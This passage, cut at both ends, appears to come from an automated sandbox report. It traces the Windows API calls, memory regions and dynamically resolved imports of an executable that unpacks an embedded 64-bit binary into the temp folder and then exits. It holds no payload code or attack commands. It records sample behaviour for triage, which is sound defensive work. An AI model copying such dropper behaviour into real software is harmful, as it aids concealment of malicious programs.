1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xef\xaf\xe6\x7a\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0300.764] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0300.764] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0300.765] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0300.765] GetProcAddress (hModule=0x75130000, lpProcName="IsWow64Process") returned 0x751496e0 [0300.765] GetCurrentProcess () returned 0xffffffff [0300.765] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ff2c | out: Wow64Process=0x19ff2c) returned 1 [0300.765] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd20, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0300.765] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x19fb18, nSize=0x104 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0x25 [0300.765] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0300.765] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0300.765] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0300.765] LockResource (hResData=0x43c648) returned 0x43c648 [0300.765] GetCurrentPackageId () returned 0x3d54 [0300.765] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x19f954, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0300.880] GetLastError () returned 0x20 [0300.880] GetLastError () returned 0x20 [0300.880] SetLastError (dwErrCode=0x20) [0300.880] GetLastError () returned 0x20 [0300.880] SetLastError (dwErrCode=0x20) [0300.880] GetLastError () returned 0x20 [0300.880] SetLastError (dwErrCode=0x20) [0300.880] GetLastError () returned 0x20 [0300.880] SetLastError (dwErrCode=0x20) [0300.880] GetLastError () returned 0x20 [0300.880] SetLastError (dwErrCode=0x20) [0300.880] GetLastError () returned 0x20 [0300.880] SetLastError (dwErrCode=0x20) [0300.880] GetLastError () returned 0x20 [0300.880] SetLastError (dwErrCode=0x20) [0300.880] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19e384 | out: lpMode=0x19e384) returned 1 [0300.978] WriteFile (in: hFile=0x3c, lpBuffer=0x19ea60*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x19e38c, lpOverlapped=0x0 | out: lpBuffer=0x19ea60*, lpNumberOfBytesWritten=0x19e38c*=0x49, lpOverlapped=0x0) returned 1 [0300.998] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fed4 | out: phModule=0x19fed4) returned 0 [0300.998] ExitProcess (uExitCode=0x1) Thread: id = 1028 os_tid = 0x938 Process: id = "157" image_name = "vidhs3md.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe" page_root = "0x64adf000" os_pid = "0xb30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "105" os_parent_pid = "0xf4c" cmd_line = "vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10643 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10644 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10645 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10646 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 10647 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 10648 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 10649 start_va = 0x400000 end_va = 0x476fff entry_point = 0x400000 region_type = mapped_file name = "vidhs3md.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe") Region: id = 10650 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10651 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10652 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 10653 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 10654 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10655 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10656 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10657 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10658 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 10659 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10660 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 10679 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 10680 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10681 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10682 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10683 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10684 start_va = 0x2a0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10685 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10686 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10687 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10688 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 10689 start_va = 0x1d0000 end_va = 0x28dfff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10690 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 10691 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 10692 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10693 start_va = 0x3c0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 10694 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 10695 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10696 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 10697 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10698 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10699 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10724 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10725 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 10726 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 10727 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 10728 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 10729 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 10730 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 10731 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 10732 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 10733 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 10734 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 10735 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 10748 start_va = 0x74550000 end_va = 0x745e1fff entry_point = 0x74550000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 10749 start_va = 0x74730000 end_va = 0x74737fff entry_point = 0x74730000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 10750 start_va = 0x580000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10751 start_va = 0x580000 end_va = 0x707fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 10752 start_va = 0x710000 end_va = 0x739fff entry_point = 0x710000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10753 start_va = 0x770000 end_va = 0x77ffff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 10754 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10755 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 10756 start_va = 0x780000 end_va = 0x900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 10757 start_va = 0x910000 end_va = 0x1d0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 10758 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10759 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10760 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 10761 start_va = 0x1d10000 end_va = 0x1e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Thread: id = 1023 os_tid = 0xb28 [0300.378] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75130000 [0300.379] GetProcAddress (hModule=0x75130000, lpProcName="SetEvent") returned 0x751560c0 [0300.379] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75156110 [0300.379] GetProcAddress (hModule=0x75130000, lpProcName="DeviceIoControl") returned 0x751487e0 [0300.379] GetProcAddress (hModule=0x75130000, lpProcName="DuplicateHandle") returned 0x75155f30 [0300.379] GetProcAddress (hModule=0x75130000, lpProcName="FormatMessageW") returned 0x75154a40 [0300.379] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventW") returned 0x75155fa0 [0300.379] GetProcAddress (hModule=0x75130000, lpProcName="CreateProcessW") returned 0x7514a510 [0300.379] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsW") returned 0x7514c8c0 [0300.379] GetProcAddress (hModule=0x75130000, lpProcName="GetDriveTypeW") returned 0x75156300 [0300.379] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDirectoryW") returned 0x75149a90 [0300.379] GetProcAddress (hModule=0x75130000, lpProcName="DeleteFileW") returned 0x751561b0 [0300.380] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadErrorMode") returned 0x7514fae0 [0300.380] GetProcAddress (hModule=0x75130000, lpProcName="HeapSize") returned 0x779e4f40 [0300.380] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringW") returned 0x75149a40 [0300.380] GetProcAddress (hModule=0x75130000, lpProcName="GetStringTypeW") returned 0x751479b0 [0300.380] GetProcAddress (hModule=0x75130000, lpProcName="TerminateThread") returned 0x7514fcb0 [0300.380] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x751492b0 [0300.380] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514a300 [0300.380] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileW") returned 0x75156180 [0300.380] GetProcAddress (hModule=0x75130000, lpProcName="FindResourceW") returned 0x75153a50 [0300.380] GetProcAddress (hModule=0x75130000, lpProcName="SizeofResource") returned 0x75148cb0 [0300.380] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x75155f20 [0300.380] GetProcAddress (hModule=0x75130000, lpProcName="SetLastError") returned 0x75142af0 [0300.380] GetProcAddress (hModule=0x75130000, lpProcName="LoadResource") returned 0x751478f0 [0300.381] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x75142db0 [0300.381] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcess") returned 0x75142da0 [0300.381] GetProcAddress (hModule=0x75130000, lpProcName="LockResource") returned 0x75147a50 [0300.381] GetProcAddress (hModule=0x75130000, lpProcName="GetCommandLineW") returned 0x7514a4b0 [0300.381] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleW") returned 0x75149660 [0300.381] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryW") returned 0x7514a0b0 [0300.381] GetProcAddress (hModule=0x75130000, lpProcName="GetStdHandle") returned 0x7514a060 [0300.381] GetProcAddress (hModule=0x75130000, lpProcName="LocalFree") returned 0x751487c0 [0300.381] GetProcAddress (hModule=0x75130000, lpProcName="LocalAlloc") returned 0x75148840 [0300.381] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75147940 [0300.381] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleFileNameW") returned 0x75149560 [0300.381] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleScreenBufferInfo") returned 0x751569c0 [0300.381] GetProcAddress (hModule=0x75130000, lpProcName="GetFileType") returned 0x75156390 [0300.381] GetProcAddress (hModule=0x75130000, lpProcName="OutputDebugStringW") returned 0x75171c30 [0300.382] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleW") returned 0x751568e0 [0300.382] GetProcAddress (hModule=0x75130000, lpProcName="WriteConsoleW") returned 0x75156920 [0300.382] GetProcAddress (hModule=0x75130000, lpProcName="SetFilePointerEx") returned 0x75156540 [0300.382] GetProcAddress (hModule=0x75130000, lpProcName="EnterCriticalSection") returned 0x779d5e80 [0300.382] GetProcAddress (hModule=0x75130000, lpProcName="LeaveCriticalSection") returned 0x779d5e00 [0300.382] GetProcAddress (hModule=0x75130000, lpProcName="SetStdHandle") returned 0x751726a0 [0300.382] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x779cda90 [0300.382] GetProcAddress (hModule=0x75130000, lpProcName="EncodePointer") returned 0x779ef190 [0300.382] GetProcAddress (hModule=0x75130000, lpProcName="DecodePointer") returned 0x779ea200 [0300.382] GetProcAddress (hModule=0x75130000, lpProcName="ExitProcess") returned 0x751574f0 [0300.382] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleExW") returned 0x75149fa0 [0300.382] GetProcAddress (hModule=0x75130000, lpProcName="MultiByteToWideChar") returned 0x75142d60 [0300.382] GetProcAddress (hModule=0x75130000, lpProcName="WideCharToMultiByte") returned 0x751475a0 [0300.382] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751425e0 [0300.383] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleMode") returned 0x75156870 [0300.383] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleInputA") returned 0x751568c0 [0300.383] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleMode") returned 0x75156900 [0300.383] GetProcAddress (hModule=0x75130000, lpProcName="CreateThread") returned 0x75149700 [0300.383] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentThreadId") returned 0x75141b90 [0300.383] GetProcAddress (hModule=0x75130000, lpProcName="ExitThread") returned 0x779f2570 [0300.383] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryExW") returned 0x75147920 [0300.383] GetProcAddress (hModule=0x75130000, lpProcName="DeleteCriticalSection") returned 0x779e9920 [0300.383] GetProcAddress (hModule=0x75130000, lpProcName="FlushFileBuffers") returned 0x751562a0 [0300.383] GetProcAddress (hModule=0x75130000, lpProcName="WriteFile") returned 0x75156590 [0300.383] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleCP") returned 0x75156860 [0300.383] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0300.383] GetProcAddress (hModule=0x75130000, lpProcName="IsProcessorFeaturePresent") returned 0x75149680 [0300.383] GetProcAddress (hModule=0x75130000, lpProcName="ReadFile") returned 0x751564a0 [0300.383] GetProcAddress (hModule=0x75130000, lpProcName="GetStartupInfoW") returned 0x7514a080 [0300.383] GetProcAddress (hModule=0x75130000, lpProcName="UnhandledExceptionFilter") returned 0x751728e0 [0300.384] GetProcAddress (hModule=0x75130000, lpProcName="SetUnhandledExceptionFilter") returned 0x7514a2c0 [0300.384] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75156020 [0300.384] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751477b0 [0300.384] GetProcAddress (hModule=0x75130000, lpProcName="TerminateProcess") returned 0x7514fbc0 [0300.384] GetProcAddress (hModule=0x75130000, lpProcName="TlsAlloc") returned 0x75149a70 [0300.384] GetProcAddress (hModule=0x75130000, lpProcName="TlsGetValue") returned 0x75141ba0 [0300.384] GetProcAddress (hModule=0x75130000, lpProcName="TlsSetValue") returned 0x75141da0 [0300.384] GetProcAddress (hModule=0x75130000, lpProcName="TlsFree") returned 0x75149930 [0300.384] GetProcAddress (hModule=0x75130000, lpProcName="IsValidCodePage") returned 0x7514a090 [0300.384] GetProcAddress (hModule=0x75130000, lpProcName="GetACP") returned 0x75148770 [0300.384] GetProcAddress (hModule=0x75130000, lpProcName="GetOEMCP") returned 0x7514fd10 [0300.384] GetProcAddress (hModule=0x75130000, lpProcName="GetCPInfo") returned 0x75149fc0 [0300.384] GetProcAddress (hModule=0x75130000, lpProcName="GetProcessHeap") returned 0x75147910 [0300.384] GetProcAddress (hModule=0x75130000, lpProcName="RtlUnwind") returned 0x75149a80 [0300.384] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceCounter") returned 0x75142dc0 [0300.385] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x75141d90 [0300.385] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x75142b90 [0300.385] GetProcAddress (hModule=0x75130000, lpProcName="GetEnvironmentStringsW") returned 0x7514a3b0 [0300.385] GetProcAddress (hModule=0x75130000, lpProcName="FreeEnvironmentStringsW") returned 0x7514a0f0 [0300.385] GetProcAddress (hModule=0x75130000, lpProcName="HeapReAlloc") returned 0x779cbae0 [0300.385] GetProcAddress (hModule=0x75130000, lpProcName="SetEndOfFile") returned 0x751564f0 [0300.385] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74c60000 [0300.385] GetProcAddress (hModule=0x74c60000, lpProcName="GetTokenInformation") returned 0x74c7ed40 [0300.385] GetProcAddress (hModule=0x74c60000, lpProcName="RegDeleteKeyW") returned 0x74c7fca0 [0300.385] GetProcAddress (hModule=0x74c60000, lpProcName="LookupPrivilegeValueW") returned 0x74c795e0 [0300.385] GetProcAddress (hModule=0x74c60000, lpProcName="AdjustTokenPrivileges") returned 0x74c80680 [0300.385] GetProcAddress (hModule=0x74c60000, lpProcName="OpenProcessToken") returned 0x74c7ee90 [0300.385] GetProcAddress (hModule=0x74c60000, lpProcName="RegSetValueExW") returned 0x74c7f0a0 [0300.385] GetProcAddress (hModule=0x74c60000, lpProcName="RegQueryValueExW") returned 